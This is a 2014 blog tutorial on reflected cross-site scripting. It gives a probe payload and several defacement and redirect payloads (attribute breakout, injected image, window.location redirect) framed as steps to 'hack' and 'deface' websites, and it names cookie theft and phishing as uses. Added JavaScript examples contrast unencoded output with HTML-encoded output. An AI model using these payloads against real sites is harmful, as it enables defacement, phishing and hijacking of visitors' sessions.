
Thursday, June 19, 2014

Cross Site Scripting

Hack websites using Cross Site Scripting:
*****************************************************
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Types of XSS vulnerabilities:

1. Persistent (stored): the payload is saved by the server and served to every visitor of the page.
2. Non-persistent (reflected): the payload is carried in the request and echoed back only in that response.

In this post I am going to explain the non-persistent (reflected) type.

Non-persistent XSS is the most common type of XSS flaw. The defect lives in server-side code, even though the injected script runs in the browser:
when a web server takes input from a request (a query-string parameter, a form field) and writes the same text back into the response without encoding it for the HTML context it lands in, the browser cannot tell the reflected input from the site's own markup, and any script inside it runs with the site's origin. This is a non-persistent XSS vulnerability.

What can a hacker do with this?

XSS attacks can be used for the following:

•Compromising and Hijacking Accounts
•Stealing User Cookies (any cookie of the site that is not marked HttpOnly is readable from document.cookie)
•Defacing Websites
•Phishing Attacks
•Posting False or Hostile Content

Steps to hack:

Step 1: Find vulnerability.

Step 2: Deface.

Finding out the vulnerability:

1) Find a text box, search field or URL parameter whose value the site echoes back in the page.

2)Type in the following:

<script>alert("hackinginception");</script>

3) If it is vulnerable, a dialog box showing "hackinginception" appears. Click OK. If your text comes back on the page but no dialog appears, look at the page source: the input may be reflected inside an attribute value or encoded, and a payload that first closes the attribute (the `">` prefix used in the defacing payloads below) may be needed.
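The reflection described above and the three-step check, as an added example (my code, not from the original post). It shows a search page rendered the vulnerable way, the same page with output encoding, and the step-2 probe turned into a check on the raw response. The host example.test, the path /search and the parameter name q are assumptions made for the example; the request URL is constructed locally and nothing is sent over the network.

```javascript
// Added example, not code from the original post. The host example.test,
// the path /search and the parameter name q are assumptions.

// Encode the five characters that can change meaning in HTML text or in a
// quoted attribute value.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable server-side rendering: the query-string value is written into the
// response unchanged, so whatever the user submitted becomes part of the markup.
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Hardened rendering: same page, but the value is HTML-encoded on output.
function renderSearchSafe(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return `<html><body><h1>Results for: ${htmlEncode(q)}</h1></body></html>`;
}

// The probe from step 2 of the post.
const PROBE = '<script>alert("hackinginception");</script>';

// Step 3 as a check on the raw response instead of on a dialog box: if the
// probe comes back byte-for-byte, the browser executes it when it renders the
// page. The request URL is constructed here; nothing touches the network.
function isReflectedUnencoded(render, probe = PROBE) {
  const url = "http://example.test/search?q=" + encodeURIComponent(probe);
  return render(url).includes(probe);
}

console.log("vulnerable page reflects the probe:", isReflectedUnencoded(renderSearchVulnerable)); // true
console.log("hardened page reflects the probe:  ", isReflectedUnencoded(renderSearchSafe));       // false
```

Checking the response body rather than waiting for a dialog is the more reliable version of step 3: a dialog proves the flaw, but its absence does not prove the page is safe, because the same reflected text can sit in a context (an attribute value, a script string) where a bare `<script>` tag is inert but a differently shaped payload is not.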

Defacing:

There are some ways to deface a site when you find an XSS vulnerability.

1) Send The Viewer To A Picture (the leading `">` closes the attribute value and the tag when your input is reflected inside an attribute; without a scheme the URL would be treated as a path on the vulnerable site, so give the full address):

"><script>location="http://www.website.com/yourdefacepic";</script>

2) Insert An Image Into The Page (this adds the image at the point where the input is reflected; it does not remove the page's existing content):

<img src="http://yoursite.com/yourdefacepic">

3) Redirect To A Website:

<script>window.location="http://www.yoursite.com/";</script>
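The `">` prefix in payload 1 is the part beginners miss, so here is an added example (my code, not from the original post) showing why it is needed. It goes one step beyond the post: the search term is reflected inside an attribute value, `<input value="...">`, rather than in the page body, and a small tokenizer counts which script tags would actually be live. The form layout, the host example.test and the parameter name q are assumptions.

```javascript
// Added example, not code from the original post. The search term is reflected
// inside an attribute value rather than in the page body. The form layout,
// the host example.test and the parameter name q are assumptions.

// No output encoding at all: the vulnerable case.
function noEncoding(s) {
  return String(s);
}

// Correct output encoding: quotes are encoded too, so reflected input can
// never end the attribute value it sits in.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Server-side rendering of a search form that pre-fills the last search term.
// `encode` is whatever encoding step the server applies before writing it out.
function renderForm(requestUrl, encode) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return `<form><input name="q" value="${encode(q)}"></form>`;
}

// Count <script start tags that appear in text content, i.e. outside any tag
// and outside any quoted attribute value; only those get executed. This is a
// deliberately small tokenizer, not a browser parser, so treat its result as a
// lower bound on what a real browser would run.
function countLiveScriptTags(html) {
  let count = 0;
  let inTag = false;
  let quote = null;
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (inTag) {
      if (quote) {
        if (c === quote) quote = null;
      } else if (c === '"' || c === "'") {
        quote = c;
      } else if (c === ">") {
        inTag = false;
      }
    } else if (c === "<") {
      if (html.slice(i, i + 7).toLowerCase() === "<script") count++;
      inTag = true;
    }
  }
  return count;
}

// Payloads from the post: the step-2 probe, and the redirect payload with the
// attribute-breakout prefix from deface payload 1 in front of it.
const PROBE = '<script>alert("hackinginception");</script>';
const BREAKOUT = '"><script>window.location="http://www.yoursite.com/";</script>';

// How many script tags would run if `payload` were submitted to a server that
// applies `encode`? The URL is constructed here; nothing touches the network.
function liveScriptsFor(payload, encode) {
  const url = "http://example.test/search?q=" + encodeURIComponent(payload);
  return countLiveScriptTags(renderForm(url, encode));
}

console.log("no encoding, step-2 probe:     ", liveScriptsFor(PROBE, noEncoding));    // 0: no dialog, yet still vulnerable
console.log("no encoding, breakout payload: ", liveScriptsFor(BREAKOUT, noEncoding)); // 1
console.log("html-encoded, breakout payload:", liveScriptsFor(BREAKOUT, htmlEncode)); // 0
```

With no encoding, the plain step-2 probe lands inside the quoted value and produces no dialog, which is exactly the case where a tester wrongly concludes the page is safe; the `">` version closes the attribute and the tag first, and the redirect runs. Encoding the quote characters as well as the angle brackets is what closes both holes, which is why stripping only `<` and `>` is not a fix.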

NOTE:
Since this is a non-persistent attack, the payload is not stored on the server and nothing on the website changes for other visitors. What attackers do instead is put the payload into a link (in the query string) and get a victim to open it; the script then runs in the victim's browser with the site's origin, which is how the information of that site's visitors gets stolen.

This Tutorial is for beginners.
Hope you liked this article... Leave your comments if you have any doubts or suggestions...
